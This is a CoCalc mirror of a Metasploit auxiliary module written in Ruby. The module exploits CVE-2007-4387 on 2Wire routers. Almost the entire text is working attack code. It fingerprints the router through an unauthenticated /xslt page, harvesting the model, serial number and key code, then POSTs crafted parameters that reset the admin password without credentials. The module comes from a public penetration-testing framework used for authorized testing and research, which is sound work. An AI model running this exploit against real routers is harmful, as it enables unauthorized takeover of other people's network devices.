Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/2wire/xslt_password_reset.rb
19778 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => '2Wire Cross-Site Request Forgery Password Reset Vulnerability',
14
'Description' => %q{
15
This module will reset the admin password on a 2Wire wireless router. This is
16
done by using the /xslt page where authentication is not required, thus allowing
17
configuration changes (such as resetting the password) as administrators.
18
},
19
'License' => MSF_LICENSE,
20
'Author' => [
21
'hkm [at] hakim.ws', # Initial discovery, poc
22
'Travis Phillips', # Msf module
23
],
24
'References' => [
25
[ 'CVE', '2007-4387' ],
26
[ 'OSVDB', '37667' ],
27
[ 'BID', '36075' ],
28
[ 'URL', 'https://seclists.org/bugtraq/2007/Aug/225' ],
29
],
30
'DisclosureDate' => '2007-08-15',
31
'Notes' => {
32
'Stability' => [CRASH_SAFE],
33
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
34
'Reliability' => []
35
}
36
)
37
)
38
39
register_options(
40
[
41
OptString.new('PASSWORD', [true, 'The password to reset to', 'admin'])
42
]
43
)
44
end
45
46
def post_auth?
47
false
48
end
49
50
def run
51
print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
52
res = send_request_raw(
53
{
54
'method' => 'GET',
55
'uri' => '/xslt?PAGE=A07'
56
}, 25
57
)
58
59
if !res
60
print_error('No response from server')
61
return
62
end
63
64
# check to see if we get HTTP OK
65
if (res.code == 200)
66
print_status('Okay, Got an HTTP 200 (okay) code. Verifying Server header')
67
else
68
print_error('Did not get HTTP 200, URL was not found. Exiting!')
69
return
70
end
71
72
# Check to verify server reported is a 2wire router
73
if res.headers['Server'].match(/2wire Gateway/i)
74
print_status("Server is a 2wire Gateway! Grabbing info\n")
75
else
76
print_error("Target doesn't seem to be a 2wire router. Exiting!")
77
return
78
end
79
80
print_status('---===[ Router Information ]===---')
81
82
# Grabbing the Model Number
83
if res.body.match(%r{<td class="textmono">(.*)</td>}i)
84
model = ::Regexp.last_match(1)
85
print_status("Model: #{model}")
86
end
87
88
# Grabbing the serial Number
89
if res.body.match(%r{<td class="data">(\d{12})</td>}i)
90
serial = ::Regexp.last_match(1)
91
print_status("Serial: #{serial}")
92
end
93
94
# Grabbing the Hardware Version
95
if res.body.match(%r{<td class="data">(\d{4}-\d{6}-\d{3})</td>}i)
96
hardware = ::Regexp.last_match(1)
97
print_status("Hardware Version: #{hardware}")
98
end
99
100
# Check the Software Version
101
if res.body.match(%r{<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>}i)
102
ver = ::Regexp.last_match(1)
103
print_status("Software version: #{ver}")
104
else
105
print_error('Target is not a version 5 router. Exiting!')
106
return
107
end
108
109
# Grabbing the Key Code
110
if res.body.match(%r{<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})</td>}i)
111
key = ::Regexp.last_match(1)
112
print_status("Key Code: #{key}\n")
113
end
114
115
print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
116
print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
117
118
res = send_request_raw(
119
{
120
'method' => 'GET',
121
'uri' => '/xslt?PAGE=H04'
122
}, 25
123
)
124
125
if res && (res.code == 200) && res.body.match(%r{<title>System Setup - Password</title>}i)
126
print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
127
128
data = 'PAGE=H04_POST'
129
data << '&THISPAGE=H04'
130
data << '&NEXTPAGE=A01'
131
data << '&PASSWORD=' + datastore['PASSWORD']
132
data << '&PASSWORD_CONF=' + datastore['PASSWORD']
133
data << '&HINT='
134
135
res = send_request_cgi(
136
{
137
'method' => 'POST',
138
'uri' => '/xslt',
139
'data' => data
140
}, 25
141
)
142
143
if res && (res.code == 200)
144
cookies = res.get_cookies
145
if cookies && cookies.match(%r{(.*); path=/})
146
cookie = ::Regexp.last_match(1)
147
print_good("Got cookie #{cookie}. Password reset was successful!\n")
148
end
149
end
150
end
151
end
152
end
153
154